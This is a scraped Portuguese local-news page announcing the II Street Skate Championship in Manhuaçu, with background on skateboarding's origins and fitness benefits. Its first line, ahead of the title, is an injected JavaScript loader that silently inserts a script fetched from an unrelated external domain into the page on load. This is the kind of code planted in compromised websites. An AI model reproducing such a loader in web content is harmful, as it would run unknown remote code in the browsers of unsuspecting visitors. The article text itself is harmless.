;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vem aí o II Campeonato de Skate Street de Manhuaçu. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Vem aí o II Campeonato de Skate Street de Manhuaçu.

Desde a inauguração da pista municipal de skate, no começo de 2013, o local se transformou num espaço de encontro de praticantes e apreciadores de esportes radicais, principalmente de skatistas e ciclistas. Para movimentar ainda mais a praça José Adolfo Assad, localizada ao lado do Terminal Rodoviário, o Governo de Manhuaçu, por meio da secretaria de Esporte e Lazer, em parceria com a loja Base Skate Shopping, vai realizar no dia 5 de novembro, das 8 às 12 horas, o II Campeonato de Skate Street do município.
A competição será dividida em duas categorias, iniciante e amador, e vai contar com a participação de um skatista profissional, atuante no circuito nacional, como convidado para abrilhantar ainda mais a manhã esportiva. Para participar é necessário se inscrever entre os dias 19 de outubro e 04 de novembro na loja Base Skate, no Coqueiro, onde todas as informações podem ser esclarecidas. Os três melhores colocados em cada categoria serão premiados.

SAIBA MAIS
O skate é considerado um esporte radical, dado seu aspecto criativo e grau de dificuldade dos movimentos. Foi inventado na década de 1960, na cidade de Los Angeles no estado da Califórnia, nos Estados Unidos a partir do desejo de surfistas, que queriam fazer das pranchas um divertimento também nas ruas, em uma época de marés baixas e seca na região. Inicialmente, foi chamada de sidewalk surf. Cinco anos mais tarde surgiram os primeiros campeonatos, mas o skate só ficou mais reconhecido uma década depois.
De acordo com especialistas, o esporte oferece ao praticante diversos benefícios, entre eles o fortalecimento do sistema respiratório e também o aeróbico, pois exige dos músculos de todo o corpo. A realização dos saltos, agachamento, giros e chutes faz com que o praticante trabalhe intensamente as pernas, principalmente joelhos e panturrilhas. O benefício não para por aí, em decorrência dos impulsos de apoiar as mãos no chão para evitar quedas, a atleta do skate trabalha o abdômen, glúteos e coxas, além dos braços que são bastantes utilizados. Já a impulsão e remadas estimulam a flexibilidade, coordenação e a concentração por meio da realização de manobras.

Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.